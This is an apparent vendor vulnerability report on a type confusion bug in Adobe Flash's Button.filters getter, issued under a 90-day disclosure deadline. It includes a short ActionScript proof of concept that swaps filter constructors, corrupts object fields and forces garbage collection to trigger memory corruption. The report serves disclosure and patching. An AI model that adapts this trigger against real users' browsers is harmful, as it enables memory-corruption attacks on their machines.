There is a type confusion issue in the Button.filters getter. If the definition of a filter constructor changes to that of a different filter between the Button.filters setter and the Button.filters getter, the filter's user data gets set to the type of the filter given to the setter, but its type gets set to the type it's constructor is defined as when the getter is called. A minimal proof of concept (must be called from a button's action) is below:
var c = new flash.filters.BlurFilter(100, 15, 5555);
c.blurX = -1;
var e = flash.filters.ConvolutionFilter;
this.filters = [c];
flash["filters"] = {BlurFilter: e};
var f = this.filters;
var d = f[0];
trace(d.matrix.length);
d.matrix = [0,1,1,1,1,1,1,1,1,1,1,1,1,1];
trace(d.color = 0x777777777777);
for(var i = 0; i < 1000; i++){
var b = new BitmapData(10, 10, true, 10); //This tends to trigger GC
}
}
A .fla file and swf are attached. To reproduce, press the grey button. The PoC works on Chrome and Firefox for Linux only, likely due to difference in when GC occurs.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
